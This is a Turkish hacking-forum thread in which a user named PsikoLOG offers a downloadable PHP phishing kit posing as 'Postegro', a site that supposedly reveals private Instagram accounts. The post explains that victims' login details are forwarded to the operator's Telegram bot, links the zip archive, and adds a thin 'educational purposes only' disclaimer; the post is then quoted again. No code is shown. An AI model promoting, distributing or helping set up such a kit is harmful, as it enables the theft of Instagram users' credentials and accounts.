Php Script [PsikoLOG] Postegro Fake Instagram Hesap Çalma Scripti | Telegram Bot Destekli

• Konuyu Başlatan PsikoLOG
  • Başlangıç tarihi
Açık Kaynak
P

PsikoLOG

<div class="bbWrapper">Selam gençler ben PsikoLOG bu script şöyle işliyor kullanıcı siteye girdiğinde normal gizli hesapları görmeye yarayan bir site sanıyor ama giriş ekranındaki bilgilerini girdiğinde Bilgiler sizin telegram botunuza iletiyor bilgileri kurulum bilgilerini OKU BUNU.txt de yazıyor ordan bakabilirsiniz.<br /> <br /> <br /> <a href="https://www.dosya.tc/server/gbrbhh/Postegro_Fake_Script.zip.html" target="_blank" class="link link--external" rel="nofollow ugc noopener"> <div class="block-mhhide block-mhhide--link"> İçeriği görüntülemek için <a href="/giris/">Giriş yapın</a> veya <a href="/kayit-ol/">Kayıt olun</a>. </div></a><br /> <br /> <b>BU SCRİPT TAMAMEN EĞİTİM AMAÇLI YAZILMIŞTIR OLUŞABİLECEK OLAYLARDAN MESULİYET KABUL ETMİYORUM</b></div>

<div class="bbWrapper"><blockquote data-attributes="member: 14392" data-quote="PsikoLOG" data-source="post: 57028" class="bbCodeBlock bbCodeBlock--expandable bbCodeBlock--quote js-expandWatch"> <div class="bbCodeBlock-title"> <a href="/goto/post?id=57028" class="bbCodeBlock-sourceJump" rel="nofollow" data-xf-click="attribution" data-content-selector="#post-57028">PsikoLOG' Alıntı:</a> </div> <div class="bbCodeBlock-content"> <div class="bbCodeBlock-expandContent js-expandContent "> Selam gençler ben PsikoLOG bu script şöyle işliyor kullanıcı siteye girdiğinde normal gizli hesapları görmeye yarayan bir site sanıyor ama giriş ekranındaki bilgilerini girdiğinde Bilgiler sizin telegram botunuza iletiyor bilgileri kurulum bilgilerini OKU BUNU.txt de yazıyor ordan bakabilirsiniz.<br /> <br /> <br /> <a href="https://www.dosya.tc/server/gbrbhh/Postegro_Fake_Script.zip.html" target="_blank" class="link link--external" rel="nofollow ugc noopener">*** Gizli metin: alıntı yapılamaz. ***</a><br /> <br /> <b>BU SCRİPT TAMAMEN EĞİTİM AMAÇLI YAZILMIŞTIR OLUŞABİLECEK OLAYLARDAN MESULİYET KABUL Etmiyorum Akal </b> </div> <div class="bbCodeBlock-expandLink js-expandLink"><a role="button" tabindex="0">Genişletmek için tıkla ...</a></div> </div> </blockquote></div>

0Konular
0Mesajlar
0Kullanıcılar
Son üye